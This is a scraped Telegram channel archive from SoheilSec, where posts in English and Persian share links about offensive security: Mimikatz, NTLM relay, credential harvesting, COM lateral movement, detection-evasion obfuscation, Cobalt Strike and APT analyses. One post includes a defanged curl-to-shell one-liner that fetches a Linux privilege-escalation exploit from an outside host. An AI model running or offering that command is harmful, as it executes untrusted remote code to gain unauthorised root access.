SoheilSec
Open in Telegram
https://soheilsec.com https://blog.peneter.com @learnpentest @peneter_com @Peneter_News @Peneter_Tools @Peneter_Media آموزش امنیت https://www.youtube.com/@soheilsec اخبار امنیت https://www.youtube.com/@Peneter جهت رزور تایم مشاوره👈 @soheilsec
Show more4 154
Subscribers
No data24 hours
-37 days
-3730 days
Posts Archive
4 154
At this week’s Microsoft BlueHat IL conference, Benjamin Delpy - widely respected for his work with Mimikatz - delivered what appears to be the first industry leak of Mimikatz 3.0.0 in a live demo. For those of us who have used Mimikatz extensively, this update is particularly intriguing. Delpy made it clear from the outset that this version won’t be publicly released anytime soon - a move that suggests significant shifts ahead.
4 154
You have got a valid NTLM relay but SMB and LDAP are signed, LDAPS has got Channel Binding and ESC8 is not available... What about WinRMS ?
Don't forget to patch your WinRMS' configurations if you enabled the default one!!
Blog:https://sensepost.com/blog/2025/is-tls-more-secure-the-winrms-case./
Tool:https://github.com/fortra/impacket/pull/1947
4 154
RemoteMonologue - A Windows credential harvesting attack that leverages the Interactive User RunAs key and coerces NTLM authentications via DCOM. Remotely compromise users without moving laterally or touching LSASS.
https://www.ibm.com/think/x-force/remotemonologue-weaponizing-dcom-ntlm-authentication-coercions#1
https://github.com/xforcered/RemoteMonologue
4 154
CVE-2025-0401: 7350pipe - Linux Privilege Escalation (all versions🤔). Exploit via a simple 1-liner: (defang: remove square brackets)
. <(curl -SsfL https://thc[.]org/7350pipe)
4 154
یک دوره باید بیان ایران یاد بگیرن چطوری تمیز کار در بیارن 🤔
https://www.bleepingcomputer.com/news/security/oracle-customers-confirm-data-stolen-in-alleged-cloud-breach-is-valid/
4 154
اقای altman کاری کرد که شاید هیچ کدوم از سرویسهای اطلاعاتی نتونن بکنن علاوه بر دانش یوزر اطلاعات در مورد کار محل کار چلنج روزانه و … حالا عکسشون هم داره زنده باد حریم شخصی 🤔
4 154
این وبینار دیشب برگزار شد تکنیکهای خیلی خاصی نگفت ولی به عنوان ردتیمر یا پنتستر باید اینارو بلد باشید. مخصوصا اگر IA از سیستم کلاینت باشه.
https://youtu.be/EG2Mbw2DVnU?si=_BRndxfQuvRodPjo
اسلایدهای ارائه:
https://www.slideshare.net/slideshow/windows-client-privilege-escalation-shared-pptx/277239036
اگر لب خواستید برای تست از ریپو میتونید کمک بگیرید براتون محیط اماده میکنه
https://github.com/nickvourd/Windows-Local-Privilege-Escalation-Cookbook
4 154
دیدم از افتا تشکر کردن بعد یک عمر یک گزارش داده ولی گویا افتا رولهای کسپر دزدیده ریپلیس کرده اسم خودش گذاشته! خدایی اونجا یکتون بلد نیستید یارا رول بنویسه🤔
4 154
Fileless lateral movement with trapped COM objects
https://www.ibm.com/think/news/fileless-lateral-movement-trapped-com-objects
poc :
https://github.com/xforcered/ForsHops
4 154
Bypassing Detections with Command-Line Obfuscation
https://www.wietzebeukema.nl/blog/bypassing-detections-with-command-line-obfuscation
4 154
یکی از دوستان زحمت جمع آوری کامند کشیده من این pdf بررسی کردم نکات خوبی داره
پیشنهاد میکنم حتما بخونید برای خودتون یه md درست کنید تو پروژه به کار میاد در زمینه دور زدن بلاگ زیر میتونه بهتون دید بده
https://s3cur3th1ssh1t.github.io/Building-a-custom-Mimikatz-binary/
⭕️ | راهنمای جامع ابزار Mimikatz
این کتاب به بررسی ابزار Mimikatz میپردازد که برای استخراج پسوردها، هشها و توکنهای دسترسی از حافظه سیستم استفاده میشود. در این کتاب، شما با تکنیکهای پایه تا پیشرفته Mimikatz آشنا خواهید شد، از جمله استخراج اعتبارنامهها، دور زدن مکانیزمهای امنیتی و افزایش دسترسی. همچنین، نمونههایی از حملات واقعی که از Mimikatz استفاده کردهاند و نحوه مقابله با این ابزار بررسی شده است.
4 154
نوروزتان خجسته باد! امیدوارم سالی سرشار از سلامتی، شادکامی و کامیابی پیش رو داشته باشید.
4 154
Another year, another insightful Red Canary Threat Detection Report, and once again, it’s time to update the Red Canary Top Techniques Matrix to track the latest trends and shifts in adversary techniques. Spoiler: some things never change, but we’re seeing a few new wrinkles that highlight how threat actors are adapting.
https://app.tidalcyber.com/share/0bdd31ef-f241-4c51-a222-dc50419be7f8
https://redcanary.com/threat-detection-report/download-report/
4 154
While tracking various state-sponsored APT groups, the Trend Zero Day Initiative Threat Hunting team discovered nearly 1,000 malicious .lnk files exploiting ZDI-CAN-25373. State-sponsored APT groups from North Korea, Iran, Russia, and China have been using ZDI-CAN-25373 for cyber espionage and data theft on a global scale.
https://www.trendmicro.com/en_us/research/25/c/windows-shortcut-zero-day-exploit.html
4 154
Cobalt Strike 4.11 is now available. This release introduces a novel Sleepmask, a novel process injection technique, new out-of-the-box obfuscation options for Beacon, asynchronous BOFs, and a DNS over HTTPS (DoH) Beacon. Additionally, we have overhauled Beacon’s reflective loader and there are numerous QoL updates.
https://www.cobaltstrike.com/blog/cobalt-strike-411-shh-beacon-is-sleeping
4 154
Deobfuscating APT28’s HTA Trojan: A Deep Dive into VBE Techniques & Multi-Layer Obfuscation (🤔!)
https://malwareanalysisspace.blogspot.com/2025/03/deobfuscating-apt28s-hta-trojan-deep.html?m=1
